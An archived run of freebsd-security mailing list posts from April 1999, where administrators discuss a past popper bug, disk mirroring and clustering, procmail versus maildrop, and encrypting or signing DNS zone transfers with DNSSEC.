virtual money ö%-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 7 4:58:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id D757E14C8C for ; Wed, 7 Apr 1999 04:58:32 -0700 (PDT) (envelope-from mike@sentex.net) Received: from ospf-wat.sentex.net (ospf-wat.sentex.net [209.167.248.81]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id HAA09808; Wed, 7 Apr 1999 07:56:22 -0400 (EDT) From: mike@sentex.net (Mike Tancsa) To: andyo@prime.net.ua ("Andy V. Oleynik") Cc: freebsd-security@FreeBSD.ORG Subject: Re: Should I be worried, Date: Wed, 07 Apr 1999 12:06:04 GMT Message-ID: <370b49be.397943492@mail.sentex.net> References: <4.1.19990406200132.00992430@mail.elehost.com> <19990407080845.A4157@keltia.freenix.fr> In-Reply-To: X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 7 Apr 1999 04:51:03 -0400, in sentex.lists.freebsd.misc you wrote: >Does this bug described somewhere? >Does it exist in latest version of popper? Check the archives around last July-August of Bugtraq. It was a nasty bug that hit a lot of people. IIRC, it was versions prior to 2.5. ---Mike Mike Tancsa (mdtancsa@sentex.net) Sentex Communications Corp, Waterloo, Ontario, Canada To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 7 5:58:19 1999 Delivered-To: freebsd-security@freebsd.org Received: from volodya.prime.net.ua (volodya.prime.net.ua [195.64.229.17]) by hub.freebsd.org (Postfix) with ESMTP id A2DCD14CAF for ; Wed, 7 Apr 1999 05:58:10 -0700 (PDT) (envelope-from andyo@prime.net.ua) Received: from prime.net.ua (localhost.prime.net.ua [127.0.0.1]) by volodya.prime.net.ua (8.8.8/8.8.8) with ESMTP id QAA04958; Wed, 7 Apr 1999 16:02:58 +0300 (EEST) (envelope-from andyo@prime.net.ua) Message-ID: <370B577A.E3CBFF5@prime.net.ua> Date: Wed, 07 Apr 1999 16:02:51 +0300 From: "Andy V. Oleynik" Organization: M-Info X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 2.2.7-RELEASE i386) X-Accept-Language: ru, uk, en MIME-Version: 1.0 To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: Re: Should I be worried, References: <4.1.19990406200132.00992430@mail.elehost.com> <19990407080845.A4157@keltia.freenix.fr> <370b49be.397943492@mail.sentex.net> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks a lot to all :) I use fresh version. War has finished, all may go to home ;) Mike Tancsa wrote: > On 7 Apr 1999 04:51:03 -0400, in sentex.lists.freebsd.misc you wrote: > > >Does this bug described somewhere? > >Does it exist in latest version of popper? > > Check the archives around last July-August of Bugtraq. It was a nasty bug > that hit a lot of people. IIRC, it was versions prior to 2.5. > > ---Mike > Mike Tancsa (mdtancsa@sentex.net) > Sentex Communications Corp, > Waterloo, Ontario, Canada > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- WBW Andy V. Oleynik (When U work in virtual office U have good chance to obtain virtual money ö%-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 7 8:44:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from socrates.i-pi.com (socrates.i-pi.com [198.49.217.5]) by hub.freebsd.org (Postfix) with ESMTP id 5EA5C14EFE for ; Wed, 7 Apr 1999 08:44:16 -0700 (PDT) (envelope-from ingham@socrates.i-pi.com) Received: (from ingham@localhost) by socrates.i-pi.com (8.9.1/8.9.1) id IAA01609; Wed, 7 Apr 1999 08:40:54 -0600 Message-ID: <19990407084054.D1562@socrates.i-pi.com> Date: Wed, 7 Apr 1999 08:40:54 -0600 From: Kenneth Ingham To: GuangChun Wen , freebsd-security@FreeBSD.ORG Subject: Re: Cluster service in FreeBSD References: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2 In-Reply-To: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp>; from GuangChun Wen on Wed, Apr 07, 1999 at 11:10:28AM +0900 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For load balancing, you can take a look at: http://www.stanford.edu/~riepel/lbnamed/ I have built several firewalls with FreeBSD and planning for failure is more an issue of planning for hardware failure, as these machines just do not crash. I do set up mirroring with ccd (details on what I learned about ccd are at http://www.i-pi.com/~ingham/ccd.html) to deal with the possibility of a disk failure. I have heard that there is a new mirroring facility in 3.x, but my firewall machines are all running 2.2.x. The biggest problem I have had is on a mail server with procmail as a local delivery agent. Procmail wants to have the whole message in memory at once, and people at one of my sites have no concept of file size or transmission time (over 56KB lines), so emailing 50MB documents is a somewhat common event. With a 16MB P120, swap space is a requirement. I added an old 400MB disk as swap space and solved the problem. Kenneth To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 7 9:54:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from icave3.icave.com.mx (icave3.icave.com.mx [148.233.5.130]) by hub.freebsd.org (Postfix) with ESMTP id CC1171580B for ; Wed, 7 Apr 1999 09:54:49 -0700 (PDT) (envelope-from rafareta@icave.com.mx) Received: from icave.com.mx ([10.129.1.250]) by icave3.icave.com.mx (8.9.1/8.9.1) with ESMTP id LAA28272 for ; Wed, 7 Apr 1999 11:51:17 -0500 (CDT) (envelope-from rafareta@icave.com.mx) Message-ID: <370B8D49.634D6D55@icave.com.mx> Date: Wed, 07 Apr 1999 10:52:25 -0600 From: "Rafael A. Reta Rodriguez" Organization: ICAVE X-Mailer: Mozilla 4.5 [en] (WinNT; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: Cluster service in FreeBSD References: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp> <19990407084054.D1562@socrates.i-pi.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kenneth Ingham wrote: > For load balancing, you can take a look at: > http://www.stanford.edu/~riepel/lbnamed/ > > I have built several firewalls with FreeBSD and planning for failure is > more an issue of planning for hardware failure, as these machines just > do not crash. I do set up mirroring with ccd (details on what I learned > about ccd are at http://www.i-pi.com/~ingham/ccd.html) to deal with the > possibility of a disk failure. I have heard that there is a new > mirroring facility in 3.x, but my firewall machines are all running > 2.2.x. Which is this facility? I want to set up a mirror disk for my mail/web server but have no clue abaut. When I search the FreeBSD site for mirroring I only get the freebsd.org site mirroring isntructions :-( To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 7 11:19:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from trooper.velocet.ca (trooper.velocet.net [209.167.225.226]) by hub.freebsd.org (Postfix) with ESMTP id 36F6314C10 for ; Wed, 7 Apr 1999 11:19:52 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id OAA00659; Wed, 7 Apr 1999 14:17:47 -0400 (EDT) From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14091.41290.616792.926953@trooper.velocet.ca> Date: Wed, 7 Apr 1999 14:17:46 -0400 (EDT) To: Kenneth Ingham Cc: GuangChun Wen , freebsd-security@FreeBSD.ORG Subject: Re: Cluster service in FreeBSD In-Reply-To: <19990407084054.D1562@socrates.i-pi.com> References: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp> <19990407084054.D1562@socrates.i-pi.com> X-Mailer: VM 6.62 under Emacs 19.34.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "Kenneth" == Kenneth Ingham writes: Kenneth> The biggest problem I have had is on a mail server with Kenneth> procmail as a local delivery agent. Procmail wants to have Kenneth> the whole message in memory at once, and people at one of my Kenneth> sites have no concept of file size or transmission time (over Kenneth> 56KB lines), so emailing 50MB documents is a somewhat common Kenneth> event. With a 16MB P120, swap space is a requirement. I Kenneth> added an old 400MB disk as swap space and solved the problem. This is quite a problem. At one of my sites, I had occaision that 10-20 multi-megabyte deliveries would occur simultaniously. If you're using procmail, your only choice at that point is more RAM --- which has led me to be procmail shy on my production machines. Mail's only going to get bigger. Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 7 11:42:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from isr3277.urh.uiuc.edu (isr3277.urh.uiuc.edu [130.126.65.13]) by hub.freebsd.org (Postfix) with SMTP id D0D1B1512E for ; Wed, 7 Apr 1999 11:42:16 -0700 (PDT) (envelope-from ftobin@bigfoot.com) Received: (qmail 30584 invoked by uid 1000); 7 Apr 1999 18:40:16 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 7 Apr 1999 18:40:16 -0000 Date: Wed, 7 Apr 1999 13:40:15 -0500 (CDT) From: Frank Tobin X-Sender: ftobin@isr3277.urh.uiuc.edu Cc: FreeBSD-security Mailing List Subject: Re: Cluster service in FreeBSD In-Reply-To: <14091.41290.616792.926953@trooper.velocet.ca> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David Gilbert, on Wed, 7 Apr 1999, wrote: > This is quite a problem. At one of my sites, I had occaision that > 10-20 multi-megabyte deliveries would occur simultaniously. If you're > using procmail, your only choice at that point is more RAM --- which > has led me to be procmail shy on my production machines. Mail's only > going to get bigger. If I'm not mistaken, maildrop ( ports/mail/maildrop ), is a replacement for procmail, and would solve your problem. It is specifically stated in its description that: maildrop is written in C++, and is significantly larger than procmail, in compiled form. However, it uses resources much more efficiently. Unlike procmail, maildrop will not read a 10 megabyte mail message into memory. Large messages are saved in a temporary file, and are filtered from that file. -- Frank Tobin "To learn what is good and what is to be http://www.bigfoot.com/~ftobin valued, those truths which cannot be shaken or changed." Myst: The Book of Atrus FreeBSD: The Power To Serve PGPenvelope = Pine + PGP 5.0(i) PGP: 1502 6E84 8C08 E828 7945 http://www.bigfoot.com/~ftobin/resources 3F4A 02F8 503A F40E B65E To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 7 11:55:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail15.svr.pol.co.uk (mail15.svr.pol.co.uk [195.92.193.25]) by hub.freebsd.org (Postfix) with ESMTP id 2E3C114E4D for ; Wed, 7 Apr 1999 11:55:25 -0700 (PDT) (envelope-from tom@eborcom.com) Received: from modem-121.amlodipine.dialup.pol.co.uk ([62.136.50.249]) by mail15.svr.pol.co.uk with esmtp (Exim 2.12 #1) id 10UxS1-0007IL-00 for freebsd-security@FreeBSD.ORG; Wed, 7 Apr 1999 19:53:26 +0100 Received: (qmail 16124 invoked by uid 5000); 7 Apr 1999 17:53:58 -0000 Date: Wed, 7 Apr 1999 18:53:58 +0100 From: Tom Hukins To: Kenneth Ingham , "Rafael A. Reta Rodriguez" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Cluster service in FreeBSD Message-ID: <19990407185357.B15987@eborcom.com> Mail-Followup-To: Kenneth Ingham , "Rafael A. Reta Rodriguez" , freebsd-security@FreeBSD.ORG References: <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp> <19990407084054.D1562@socrates.i-pi.com> <370B8D49.634D6D55@icave.com.mx> <00b201be809b$ced53cc0$b366b4cb@wen.iisi.co.jp> <19990407084054.D1562@socrates.i-pi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <19990407084054.D1562@socrates.i-pi.com>; from Kenneth Ingham on Wed, Apr 07, 1999 at 08:40:54AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Apr 07, 1999 at 10:52:25AM -0600, Rafael A. Reta Rodriguez wrote: > > Kenneth Ingham wrote: > > > I have heard that there is a new > > mirroring facility in 3.x, but my firewall machines are all running > > 2.2.x. > > Which is this facility? I want to set up a mirror disk for my mail/web server > but have no clue abaut. When I search the FreeBSD site for mirroring I only > get the freebsd.org site mirroring isntructions :-( It's called Vinum. > > The biggest problem I have had is on a mail server with procmail as a > > local delivery agent. Procmail wants to have the whole message in memory You could always use Maildrop (/usr/ports/mail/maildrop) instead. Regards, Tom To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 7 16:46:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 38A4114CA9 for ; Wed, 7 Apr 1999 16:46:19 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id JAA29377; Thu, 8 Apr 1999 09:14:35 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA14258; Thu, 8 Apr 1999 09:14:33 +0930 Date: Thu, 8 Apr 1999 09:14:32 +0930 (CST) From: Kris Kennaway X-Sender: kkennawa@bragg To: Frank Tobin Cc: FreeBSD-security Mailing List Subject: Re: Cluster service in FreeBSD In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 7 Apr 1999, Frank Tobin wrote: > If I'm not mistaken, maildrop ( ports/mail/maildrop ), is a replacement > for procmail, and would solve your problem. It is specifically stated in > its description that: Heh. I accidentally broke the maildrop port last night during a bad commit while attempting to upgrade the port to a newer version. It'll be fixed in about 12 hours.. Kris ----- The Feynman problem-solving algorithm: 1. Write down the problem 2. Think real hard 3. Write down the solution To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 2:37:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns.uk1.vbc.net (ns.uk1.vbc.net [194.207.2.1]) by hub.freebsd.org (Postfix) with ESMTP id 0DBC3153BC for ; Thu, 8 Apr 1999 02:37:27 -0700 (PDT) (envelope-from grant@vbc.net) Received: from gromit (gromit.uk1.vbc.net [194.207.2.6]) by ns.uk1.vbc.net (8.8.8/8.8.8) with SMTP id KAA29636 for ; Thu, 8 Apr 1999 10:35:29 +0100 (BST) (envelope-from grant@vbc.net) Message-ID: <007801be81a2$8f98e680$0602cfc2@gromit.uk1.vbc.net> From: "Grant Beckerleg" To: Subject: ssh and scp Date: Thu, 8 Apr 1999 10:31:20 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.1 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello people, I am very new to FreeBSD and I have been asked to investigate some security issues. I am not sure if this is FreeBSD specific or a general OS question so please bear with me. I use ssh to securely login to remote machines and I am looking into secure transfer of DNS database records between nameservers. I intend to use Secure Copy Program for transfer between company nameservers but I am unsure of the best method to tackle the transfer of our customers DNS stuff to our nameserver. Using anonymous ftp would compromise the customers security but I do not know the best solution. Could someone point me in the right direction, please? Rgds, Grant Beckerleg VBCnet GB Ltd http://www.vbc.net tel +44 117 929 1316 fax +44 117 927 2015 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 2:40:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from atdot.dotat.org (atdot.dotat.org [150.101.89.3]) by hub.freebsd.org (Postfix) with ESMTP id 9A85515981 for ; Thu, 8 Apr 1999 02:40:16 -0700 (PDT) (envelope-from newton@atdot.dotat.org) Received: (from newton@localhost) by atdot.dotat.org (8.9.2/8.7) id TAA11475; Thu, 8 Apr 1999 19:06:10 +0930 (CST) From: Mark Newton Message-Id: <199904080936.TAA11475@atdot.dotat.org> Subject: Re: ssh and scp To: grant@vbc.net (Grant Beckerleg) Date: Thu, 8 Apr 1999 19:06:09 +0930 (CST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <007801be81a2$8f98e680$0602cfc2@gromit.uk1.vbc.net> from "Grant Beckerleg" at Apr 8, 99 10:31:20 am X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Grant Beckerleg wrote: > I am very new to FreeBSD and I have been asked > to investigate some security issues. I am not sure if this is FreeBSD > specific or a general OS question so please bear with me. > I use ssh to securely login to remote machines and I am looking into > secure transfer of DNS database records between nameservers. Maybe I'm missing something, but isn't that what zone transfers are for? - mark -------------------------------------------------------------------- I tried an internal modem, newton@atdot.dotat.org but it hurt when I walked. Mark Newton ----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 ----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 2:54: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from bofh.fastnet.co.uk (lart.org.uk [194.207.104.22]) by hub.freebsd.org (Postfix) with ESMTP id 7BE1C14BD7 for ; Thu, 8 Apr 1999 02:53:48 -0700 (PDT) (envelope-from synak@bofh.fastnet.co.uk) Received: (from root@localhost) by bofh.fastnet.co.uk (8.8.8/8.8.8) id KAA03230 for freebsd-security@freebsd.org; Thu, 8 Apr 1999 10:51:45 +0100 (BST) (envelope-from synak) Date: Thu, 8 Apr 1999 10:51:45 +0100 From: Jay Tribick To: freebsd-security@freebsd.org Subject: Re: ssh and scp Message-ID: <19990408105145.J2213@bofh.fastnet.co.uk> References: <007801be81a2$8f98e680$0602cfc2@gromit.uk1.vbc.net> <199904080936.TAA11475@atdot.dotat.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: <199904080936.TAA11475@atdot.dotat.org>; "Mark Newton" on 08.04.1999 @ 10:36:09 BST Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi > > I am very new to FreeBSD and I have been asked > > to investigate some security issues. I am not sure if this is FreeBSD > > specific or a general OS question so please bear with me. > > I use ssh to securely login to remote machines and I am looking into > > secure transfer of DNS database records between nameservers. > > Maybe I'm missing something, but isn't that what zone transfers > are for? Yeh but he's probably looking for something that's encrypted - you could try the new DNSSEC beta's (www.toad.com/~dnssec , but AFAIK they just sign the zone files and don't actually encrypt them over the link. Other than that, set them both up as being 'masters' and just scp the zone files over every few [hours]. -- Regards, Jay Tribick [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 3: 1: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 7F2EB14D66 for ; Thu, 8 Apr 1999 03:00:57 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 84018 invoked by uid 1001); 8 Apr 1999 09:58:56 +0000 (GMT) To: netadmin@fastnet.co.uk Cc: freebsd-security@freebsd.org Subject: Re: ssh and scp From: sthaug@nethelp.no In-Reply-To: Your message of "Thu, 8 Apr 1999 10:51:45 +0100" References: <19990408105145.J2213@bofh.fastnet.co.uk> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Thu, 08 Apr 1999 11:58:56 +0200 Message-ID: <84016.923565536@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Maybe I'm missing something, but isn't that what zone transfers > > are for? > > Yeh but he's probably looking for something that's encrypted - > you could try the new DNSSEC beta's (www.toad.com/~dnssec , but > AFAIK they just sign the zone files and don't actually encrypt > them over the link. Note that: 1. BIND 8.2 already supports (part of) DNSSEC. 2. But there are known bugs in the 8.2 implementation which can give you crashes if it's used. An unofficial patch is available. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 3: 2: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from bofh.fastnet.co.uk (lart.org.uk [194.207.104.22]) by hub.freebsd.org (Postfix) with ESMTP id A19F31505C for ; Thu, 8 Apr 1999 03:01:59 -0700 (PDT) (envelope-from synak@bofh.fastnet.co.uk) Received: (from root@localhost) by bofh.fastnet.co.uk (8.8.8/8.8.8) id KAA03343 for freebsd-security@freebsd.org; Thu, 8 Apr 1999 10:59:56 +0100 (BST) (envelope-from synak) Date: Thu, 8 Apr 1999 10:59:56 +0100 From: Jay Tribick To: freebsd-security@freebsd.org Subject: Re: ssh and scp Message-ID: <19990408105956.M2213@bofh.fastnet.co.uk> References: <19990408105145.J2213@bofh.fastnet.co.uk> <84016.923565536@verdi.nethelp.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: <84016.923565536@verdi.nethelp.no>; "sthaug@nethelp.no" on 08.04.1999 @ 10:58:56 BST Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi > > > Maybe I'm missing something, but isn't that what zone transfers > > > are for? > > > > Yeh but he's probably looking for something that's encrypted - > > you could try the new DNSSEC beta's (www.toad.com/~dnssec , but > > AFAIK they just sign the zone files and don't actually encrypt > > them over the link. > > Note that: > > 1. BIND 8.2 already supports (part of) DNSSEC. > 2. But there are known bugs in the 8.2 implementation which can give > you crashes if it's used. An unofficial patch is available. Am I right in thinking that it doesn't encrypt the transfer, just signs it so that it can be authenticated? -- Regards, Jay Tribick [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 3:34:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 394CF150F2 for ; Thu, 8 Apr 1999 03:34:22 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 85143 invoked by uid 1001); 8 Apr 1999 10:32:22 +0000 (GMT) To: netadmin@fastnet.co.uk Cc: freebsd-security@freebsd.org Subject: Re: ssh and scp From: sthaug@nethelp.no In-Reply-To: Your message of "Thu, 8 Apr 1999 10:59:56 +0100" References: <19990408105956.M2213@bofh.fastnet.co.uk> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Thu, 08 Apr 1999 12:32:22 +0200 Message-ID: <85141.923567542@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Note that: > > > > 1. BIND 8.2 already supports (part of) DNSSEC. > > 2. But there are known bugs in the 8.2 implementation which can give > > you crashes if it's used. An unofficial patch is available. > > Am I right in thinking that it doesn't encrypt the transfer, > just signs it so that it can be authenticated? Yup. From RFC 2065: 2. Overview of the DNS Extensions The Domain Name System (DNS) protocol security extensions provide three distinct services: key distribution as described in Section 2.2 below, data origin authentication as described in Section 2.3 below, and transaction and request authentication, described in Section 2.4 below. Special considerations related to "time to live", CNAMEs, and delegation points are also discussed in Section 2.3. 2.1 Services Not Provided It is part of the design philosophy of the DNS that the data in it is public and that the DNS gives the same answers to all inquirers. Following this philosophy, no attempt has been made to include any sort of access control lists or other means to differentiate inquirers. In addition, no effort has been made to provide for any confidentiality for queries or responses. (This service may be available via IPSEC [RFC 1825].) So it explicitly does not provide confidentiality. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 4:46:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id A7C10150F8 for ; Thu, 8 Apr 1999 04:46:30 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id HAA12764; Thu, 8 Apr 1999 07:44:17 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Thu, 8 Apr 1999 07:44:17 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Jay Tribick Cc: freebsd-security@freebsd.org Subject: Re: ssh and scp In-Reply-To: <19990408105956.M2213@bofh.fastnet.co.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 8 Apr 1999, Jay Tribick wrote: > > 1. BIND 8.2 already supports (part of) DNSSEC. > > 2. But there are known bugs in the 8.2 implementation which can give > > you crashes if it's used. An unofficial patch is available. > > Am I right in thinking that it doesn't encrypt the transfer, > just signs it so that it can be authenticated? This is intentional--DNS is not intended to provide privacy, in this case only integrity and authenticity. While BIND supports some access control on the release of full zones currently, the fundamental design as public name service makes that only a secondary goal. This is especially the case if you look at DNSSEC NXT support -- that is, the authenticable denial that a particular name exists. This is done by having signed records that describe the gaps between legitimate records (i.e., a record that says, the next record in the zone is named blah.blah.blah). A technique named NXT-walking is described, in which an attacker can retrieve a well-known record in the zone, and then walk down the zone using the NXT records to retrieve all the other names. There was some talk of changing the NXT records to use a one-way hash of some kind on the second name, but I haven't followed DNSSEC closely in a number of months (too many RFCs, too little time). DNSSEC has enourmous potential; now if only we can prevent DNS politics from screwing it up. It can provide a public key infrastructure bound to a well-known naming scheme; for example, you can stuff web server and SSH keys into zones, and be able to walk securely down the DNS hierarchy in the style of a certificate hierarchy. And of course, there is that problem of the root key... Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 8 5:16: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from bsd.vniigazmain.gazprom.ru (a17.gazprom.ru [194.215.12.17]) by hub.freebsd.org (Postfix) with ESMTP id 9BB0314E1A for ; Thu, 8 Apr 1999 05:15:39 -0700 (PDT) (envelope-from smelekov@bsd.vniigazmain.gazprom.ru) Received: from vniigazmain.gazprom.ru by bsd.vniigazmain.gazprom.ru with ESMTP id QAA15770; (8.9.1/vak/1.9) Thu, 8 Apr 1999 16:07:21 +0400 (MSD) Message-ID: <370C9EF1.AD0BDAB@vniigazmain.gazprom.ru> Date: Thu, 08 Apr 1999 16:20:01 +0400 From: "Serguei V. Melekhov" Reply-To: smelekov@vniigazmain.gazprom.ru Organization: =?iso-8859-1?Q?=C4=CF?= "=?iso-8859-1?Q?=C2=CD=C8=C8=C3=C0=C7?=" =?iso-8859-1?Q?=CE=C0=CE?= "=?iso-8859-1?Q?=C3=C0=C7=CF=D0=CE=CC?=" X-Mailer: Mozilla 4.5 [en] (Win98; I) X-Accept-Language: ru,en MIME-Version: 1.0 To: "freebsd-security@FreeBSD.ORG" Subject: /Kernel Calcru Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, Sorry for the dumb question. Just don't know what does that mean? Apr 8 09:09:09 mail /kernel: calcru: negative time: -478 usec Anyway, Time plays no role here. Just this kernel calcru message?! Thanks in advance. -- Yours, Serguei V. Melekhov System Administrator of International Relations And Information Division All-Russian Scientific Research Institute of Natural Gases and Gas Technologies Tel. (095) 355-9165 